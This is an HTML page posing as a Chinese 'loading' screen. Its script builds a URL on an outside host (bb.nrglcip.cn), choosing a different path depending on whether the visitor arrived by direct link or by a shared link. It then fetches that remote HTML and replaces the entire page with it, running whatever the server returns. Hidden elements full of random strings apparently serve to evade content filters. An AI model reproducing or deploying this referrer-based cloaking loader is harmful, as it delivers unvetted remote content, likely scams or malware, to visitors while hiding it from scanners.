<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Tpa5nPd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Tpa5nPd .YblzcmWV4gH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Tpa5nPd .content {
            line-height: 50px;
            text-align: center
        }

        .Tpa5nPd .img {
            width: 100%
        }

        .Tpa5nPd .kjm0rxE645I {
            text-align: center
        }

        .Tpa5nPd .kjm0rxE645I span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Tpa5nPd .kjm0rxE645I span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Tpa5nPd .kjm0rxE645I span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Tpa5nPd .kjm0rxE645I span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Tpa5nPd .kjm0rxE645I span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Tpa5nPd .kjm0rxE645I span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Tpa5nPd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NHhdZM5F4AD(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var LlEKa = NHhdZM5F4AD('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ LlEKa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ LlEKa +".html?a=share";
		}
		
        mKL07Bu8J=url+"#"+new Date().getTime();
        mKL07Bu8J && function() {
            $.get(mKL07Bu8J, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>gqFDsmMHRPiMfXhLjVmU79ky</span>
<div style='display:none'>olPGKQQVwe1k8hBoA9sxSqXkFAeU41sJUqLzeEFq7</div>
<a  href='#' style='display:none'>T8tSlrQOfVq</a>
<img  src='' style='display:none'>
<span style='display:none'>gqFDsmMHRPiMfXhLjVmU79ky</span><div class="Tpa5nPd">
    <div class="YblzcmWV4gH">
        <div class="kjm0rxE645I">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>YxI6QTUW2bRjrdzFI846NOZr0L5QxcFYqVlJklBlFP1Z7qsGtSf3SvBMb</p>
<h1 style='display:none' >A0ZYxcoMk972lE0q153niGvmRrWIJLZzDmVSkP5XH6z2zEE</h1>
<div style='display:none'>z0sC7BHyetIC0EoZa9AwJ1G26ild8LYCcn18SK7v1LQFVVySvJsCloKdjjvAH8NWy0UhZckKS0FEybYMO4UjgT32cmM2EAgPK</div></body>
</html>